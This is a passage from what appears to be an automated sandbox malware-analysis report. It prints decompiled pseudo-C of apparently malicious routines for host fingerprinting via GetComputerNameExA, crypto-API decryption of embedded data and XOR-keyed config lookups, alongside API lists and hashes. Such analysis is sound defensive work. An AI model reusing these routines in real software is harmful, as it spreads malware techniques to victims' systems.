                    • StrTrimA.SHLWAPI(?,04449284,00000002,?,0444104B,?,04F495AC), ref: 04443B9B
                    • StrChrA.SHLWAPI(?,00000020,?,0444104B,?,04F495AC), ref: 04443BA6
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Trim
                    • String ID:
                    • API String ID: 3043112668-0
                    • Opcode ID: 43acc515dcde6b4184c3fc63d8bea2c36c829128a3ccc2b8199bc177925fdd0c
                    • Instruction ID: 321bd72f340e885b522153a6228380095d46bbcf8b0bc281303d41bdb5c8327f
                    • Opcode Fuzzy Hash: 43acc515dcde6b4184c3fc63d8bea2c36c829128a3ccc2b8199bc177925fdd0c
                    • Instruction Fuzzy Hash: AF01B1713003856FFB209E2A8C44F577B8DEBC9B94F000013AE45CB283D630E8028660
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0444607D Relevance: 3.8, APIs: 3, Instructions: 81COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0444607D(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E044463FD(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x444a374, 0x110);
					_t27 =  *0x444a378; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E044443A6(0x110, _a4, _t27, 0);
					}
					if(E04445B65( &_v36) != 0) {
						_t35 = E04444872(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_v16 = E04446412(_t55, _a8, _t51, _t46, _a12);
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0xbf0845c7
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E044417AB(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E044417AB(_a4);
				}
				return _v16;
			}















                    0x04446083
                    0x04446088
                    0x04446095
                    0x04446098
                    0x0444609b
                    0x044460a2
                    0x044460a5
                    0x044460b3
                    0x044460b8
                    0x044460bd
                    0x044460c2
                    0x044460c4
                    0x044460cc
                    0x044460cc
                    0x044460db
                    0x044460f0
                    0x044460f7
                    0x044460fe
                    0x04446104
                    0x04446112
                    0x04446118
                    0x0444611b
                    0x04446128
                    0x0444612d
                    0x04446131
                    0x04446131
                    0x044460f7
                    0x0444613c
                    0x04446147
                    0x04446147
                    0x04446153

                    APIs
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • memcpy.NTDLL(00000000,00000110,?,?,?,?,04444DD9,?,04443AC6,04443AC6,?), ref: 044460B3
                    • memset.NTDLL ref: 04446128
                    • memset.NTDLL ref: 0444613C
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: memset$AllocateHeapmemcpy
                    • String ID:
                    • API String ID: 1529149438-0
                    • Opcode ID: 5d2bb94f622dc7e1a98177b5ef74964eda7e3fb175b21a0b11b68cb7b7693172
                    • Instruction ID: 44e5de6d63494e9c08ea03fb335dc5337186c56aa1c7925f5f0f05b6f1aca177
                    • Opcode Fuzzy Hash: 5d2bb94f622dc7e1a98177b5ef74964eda7e3fb175b21a0b11b68cb7b7693172
                    • Instruction Fuzzy Hash: 7E212475A00118ABFF11EF66CC45FDE7BB8AF85644F04405AF905E7242D734E6418BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04445F80 Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E04445F80(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E044414E4(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x444a320; // 0xafd5a8
						_t20 = _t68 + 0x444b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E044463B0(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                    0x04445f86
                    0x04445f89
                    0x04445f99
                    0x04445fa2
                    0x04445fa6
                    0x04446074
                    0x0444607a
                    0x0444607a
                    0x04445fc0
                    0x04445fc5
                    0x04445fc9
                    0x04445fcf
                    0x04445fd4
                    0x04445fdb
                    0x04445fea
                    0x04445fea
                    0x04445fee
                    0x04445ff0
                    0x04445ffc
                    0x04446007
                    0x04446012
                    0x04446016
                    0x04446020
                    0x04446024
                    0x04446026
                    0x0444602b
                    0x04446032
                    0x04446042
                    0x04446042
                    0x0444602b
                    0x04446024
                    0x04446044
                    0x04446049
                    0x0444604e
                    0x0444604e
                    0x04446054
                    0x0444605a
                    0x0444605f
                    0x0444605f
                    0x04446064
                    0x04446069
                    0x04446069
                    0x04446064
                    0x04445fee
                    0x0444606b
                    0x04446071
                    0x00000000

                    APIs
                      • Part of subcall function 044414E4: SysAllocString.OLEAUT32(80000002), ref: 0444153B
                      • Part of subcall function 044414E4: SysFreeString.OLEAUT32(00000000), ref: 044415A0
                    • SysFreeString.OLEAUT32(?), ref: 0444605F
                    • SysFreeString.OLEAUT32(04442BCC), ref: 04446069
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: String$Free$Alloc
                    • String ID:
                    • API String ID: 986138563-0
                    • Opcode ID: 1a3dfb1304fa69b82b05f56b4e1c6e4630f6ff86664b53a8dcceab8aa05421da
                    • Instruction ID: 74d58a3718afe199c2cb70bdd4921491ff66452e4bf8944a0d1bebb5fc6ff845
                    • Opcode Fuzzy Hash: 1a3dfb1304fa69b82b05f56b4e1c6e4630f6ff86664b53a8dcceab8aa05421da
                    • Instruction Fuzzy Hash: B631A772500208EFDF20DF69C888C9BBB79FBCA7407114649F9059B211D336EC91CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04442985 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 42memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04442985(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E04441BC5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0x444a2d8, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E04443CEA(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}








                    0x04442985
                    0x0444298d
                    0x044429a4
                    0x044429bf
                    0x044429c3
                    0x044429c8
                    0x044429ca
                    0x044429da
                    0x044429e6
                    0x044429cc
                    0x044429cc
                    0x044429cf
                    0x044429d4
                    0x044429d4
                    0x044429ca
                    0x044429ec
                    0x044429f0
                    0x044429f0
                    0x04442999
                    0x0444299e
                    0x044429a2
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                      • Part of subcall function 04443CEA: SysFreeString.OLEAUT32(00000000), ref: 04443D50
                    • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,044433D6,?,004F0053,04F493D8,00000000,?), ref: 044429E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Free$HeapString
                    • String ID: Ut
                    • API String ID: 3806048269-8415677
                    • Opcode ID: 0de32814741d99889475dae66f8e09eb2d82274ab5b7215eb777b25210ffe819
                    • Instruction ID: b74f8d5d5858c74eac0c5bd59d5468f981a01c58f38987d944d40e26b85f2a1a
                    • Opcode Fuzzy Hash: 0de32814741d99889475dae66f8e09eb2d82274ab5b7215eb777b25210ffe819
                    • Instruction Fuzzy Hash: 7B014B32200259BBEF229F84DC01FEB7B69FF84790F04801AFE045A261D771E960EB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0444256F Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E0444256F(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E044463FD(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E044417AB(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                    0x04442574
                    0x0444257f
                    0x04442581
                    0x04442587
                    0x04442589
                    0x0444258e
                    0x04442597
                    0x0444259b
                    0x044425a4
                    0x044425a8
                    0x044425b7
                    0x044425aa
                    0x044425ab
                    0x044425b0
                    0x044425b0
                    0x044425a8
                    0x0444259b
                    0x044425c0

                    APIs
                    • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,00000000,?,?,04446999), ref: 04442587
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,?,?,04446999), ref: 044425A4
                      • Part of subcall function 044417AB: HeapFree.KERNEL32(00000000,00000000,04442976,00000000,?,?,00000000), ref: 044417B7
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: ComputerHeapName$AllocateFree
                    • String ID:
                    • API String ID: 187446995-0
                    • Opcode ID: 1278630133b9d3213f542952b020870b99d1a3995cc495fa55bad15737b685d0
                    • Instruction ID: 51fe7186f4b25078498cb033d11c77c44cb7495100b4f861231d4f64e1227917
                    • Opcode Fuzzy Hash: 1278630133b9d3213f542952b020870b99d1a3995cc495fa55bad15737b685d0
                    • Instruction Fuzzy Hash: 5FF05B76600145FAFF11D69A8C14F9F7ABCDBC5654F11009BF904D3241E9B0EF029670
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 044445D2 Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E044445D2(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t8;
				void* _t9;
				void* _t10;
				signed int _t11;

				_t11 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x444a2d8 = _t3;
				if(_t3 == 0) {
					_t9 = 8;
					return _t9;
				}
				 *0x444a1c8 = GetTickCount();
				_t5 = E04445A5A(_a4);
				if(_t5 == 0) {
					E04442A4C(_t10, _a4); // executed
					if(E04444C43(_t10) != 0) {
						 *0x444a300 = 1; // executed
					}
					_t8 = E04446535(_t11); // executed
					return _t8;
				}
				return _t5;
			}









                    0x044445d2
                    0x044445db
                    0x044445e3
                    0x044445e8
                    0x044445ec
                    0x00000000
                    0x044445ec
                    0x044445f9
                    0x044445fe
                    0x04444605
                    0x0444460b
                    0x04444617
                    0x04444619
                    0x04444619
                    0x04444623
                    0x00000000
                    0x04444623
                    0x04444628

                    APIs
                    • HeapCreate.KERNEL32(00000000,00400000,00000000,0444108E,?), ref: 044445DB
                    • GetTickCount.KERNEL32 ref: 044445EF
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: CountCreateHeapTick
                    • String ID:
                    • API String ID: 2177101570-0
                    • Opcode ID: 047b34b538ff58c20558b4b536e80360e49f5feacad2af432ca5f26cdcf660c4
                    • Instruction ID: 83386f0d0a57180aa8ff8064613360ab3e246335727c87ffa1e81e80ec58a4e5
                    • Opcode Fuzzy Hash: 047b34b538ff58c20558b4b536e80360e49f5feacad2af432ca5f26cdcf660c4
                    • Instruction Fuzzy Hash: 3FE06D74684200ABFF606F71AD0670A75A4BBC070AF10411AE508E1195EBB9A840AA21
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04443CEA Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                    Download Yara Rule
                    C-Code - Quality: 34%
                    			E04443CEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x444a320; // 0xafd5a8
				_t4 = _t15 + 0x444b39c; // 0x4f48944
				_t20 = _t4;
				_t6 = _t15 + 0x444b124; // 0x650047
				_t17 = E04445F80(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E04442E8A(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                    0x04443cf4
                    0x04443cf6
                    0x04443cfd
                    0x04443cfe
                    0x04443cff
                    0x04443d00
                    0x04443d06
                    0x04443d0b
                    0x04443d0b
                    0x04443d15
                    0x04443d27
                    0x04443d2e
                    0x04443d5d
                    0x04443d30
                    0x04443d35
                    0x04443d5a
                    0x04443d37
                    0x04443d3a
                    0x04443d41
                    0x04443d4c
                    0x04443d43
                    0x04443d46
                    0x04443d46
                    0x04443d50
                    0x04443d50
                    0x04443d35
                    0x04443d64

                    APIs
                      • Part of subcall function 04445F80: SysFreeString.OLEAUT32(?), ref: 0444605F
                      • Part of subcall function 04442E8A: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,044425F5,004F0053,00000000,?), ref: 04442E93
                      • Part of subcall function 04442E8A: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,044425F5,004F0053,00000000,?), ref: 04442EBD
                      • Part of subcall function 04442E8A: memset.NTDLL ref: 04442ED1
                    • SysFreeString.OLEAUT32(00000000), ref: 04443D50
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: FreeString$lstrlenmemcpymemset
                    • String ID:
                    • API String ID: 397948122-0
                    • Opcode ID: f50fff2c1814c39dca417150f91c0176230a811268131928a2ece27bdd3caa28
                    • Instruction ID: e51af1db723117dce4881e982db5d18d9f7a51cc079962ef3bbb15251ad12ceb
                    • Opcode Fuzzy Hash: f50fff2c1814c39dca417150f91c0176230a811268131928a2ece27bdd3caa28
                    • Instruction Fuzzy Hash: AD017172600029FFEF119FA8CC04DAEBBB9FB84B54F404466EA05E7161E3B0B915DB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 044456CF Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 88%
                    			E044456CF(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                    0x044456cf
                    0x044456dc
                    0x044456dd
                    0x044456de
                    0x044456e5
                    0x04445713
                    0x04445714
                    0x04445717
                    0x0444571d
                    0x00000000
                    0x00000000
                    0x044456fc
                    0x04445706
                    0x0444570d
                    0x00000000
                    0x044456fe
                    0x04445701
                    0x04445721
                    0x04445703
                    0x04445703
                    0x00000000
                    0x04445703
                    0x04445701
                    0x04445728
                    0x0444572e
                    0x0444572e
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: c74177b28b81dc9737013a895ad6f7c4b057f6b6cb2e4fe5445a20d2aded8cf7
                    • Instruction ID: 7d40c99089ddce987665807e70d1f3cf435f771e4e322a1091967abfc3fec4bd
                    • Opcode Fuzzy Hash: c74177b28b81dc9737013a895ad6f7c4b057f6b6cb2e4fe5445a20d2aded8cf7
                    • Instruction Fuzzy Hash: 0AF0C975D01218FFEF10DBD4D488AEEB7B8FF45645F1080ABE60667240D3746A84DB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04447885 Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E04447885(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E04444872( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E044463FD(_a8 + _a8);
					if(_t21 != 0) {
						E0444213D(_a4, _t21, _t23);
					}
					E044417AB(_a4);
				}
				return _t21;
			}





                    0x0444788d
                    0x04447894
                    0x04447896
                    0x044478a5
                    0x044478ac
                    0x044478bb
                    0x044478bf
                    0x044478c6
                    0x044478c6
                    0x044478ce
                    0x044478d3
                    0x044478d8

                    APIs
                    • lstrlen.KERNEL32(?,?,?,00000000,?,0444191E,00000000,?,?,?,04446ABB,?,04F495B0), ref: 04447896
                      • Part of subcall function 04444872: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,04443AC6), ref: 044448AA
                      • Part of subcall function 04444872: memcpy.NTDLL(?,04443AC6,00000010,?,?,?,?,?,?,?,?,?,?,044460F5,00000000,04444DD9), ref: 044448C3
                      • Part of subcall function 04444872: CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 044448EC
                      • Part of subcall function 04444872: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04444904
                      • Part of subcall function 04444872: memcpy.NTDLL(00000000,04444DD9,04443AC6,0000011F), ref: 04444956
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                    • String ID:
                    • API String ID: 894908221-0
                    • Opcode ID: 8b29880f25cc4f09133b1ce6d0f7e75904fe61459a7434ef46c28b9c5f8a2159
                    • Instruction ID: 7677b31d7fe85c18e5fd3ca72d162438c297853f9615d1720f281be6310b9280
                    • Opcode Fuzzy Hash: 8b29880f25cc4f09133b1ce6d0f7e75904fe61459a7434ef46c28b9c5f8a2159
                    • Instruction Fuzzy Hash: 35F03A76100508BAEF016E56DC04DEB3FADEFC53A4B018027FD18DA111DB31EA569BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04444DC8 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04444DC8(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E0444607D(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E044417AB(_a4);
				}
				return _t12;
			}





                    0x04444dd4
                    0x04444dd9
                    0x04444ddd
                    0x04444de4
                    0x04444def
                    0x04444df3
                    0x04444df3
                    0x04444dfc

                    APIs
                      • Part of subcall function 0444607D: memcpy.NTDLL(00000000,00000110,?,?,?,?,04444DD9,?,04443AC6,04443AC6,?), ref: 044460B3
                      • Part of subcall function 0444607D: memset.NTDLL ref: 04446128
                      • Part of subcall function 0444607D: memset.NTDLL ref: 0444613C
                    • memcpy.NTDLL(?,04443AC6,00000000,?,04443AC6,04443AC6,?,?,04443AC6,?), ref: 04444DE4
                      • Part of subcall function 044417AB: HeapFree.KERNEL32(00000000,00000000,04442976,00000000,?,?,00000000), ref: 044417B7
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: memcpymemset$FreeHeap
                    • String ID:
                    • API String ID: 3053036209-0
                    • Opcode ID: cbe814ac95b5c3fbea9387f03cde9c72dc3506a6f1379caf50c8319b0ad1936c
                    • Instruction ID: f0f60cf20c8e79baa7ff32eb5691bb2e530f44c2ef1457b41d99928a0cda149b
                    • Opcode Fuzzy Hash: cbe814ac95b5c3fbea9387f03cde9c72dc3506a6f1379caf50c8319b0ad1936c
                    • Instruction Fuzzy Hash: CEE08C7650052977EF122A95DC00EEFBF6CDF926D1F00402BFE088A201E632E65097F2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 04444EF3 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258memoryCOMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E04444EF3(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x444a31c; // 0x69b25f44
				if(E04444451( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x444a374 = _v8;
				}
				_t33 =  *0x444a31c; // 0x69b25f44
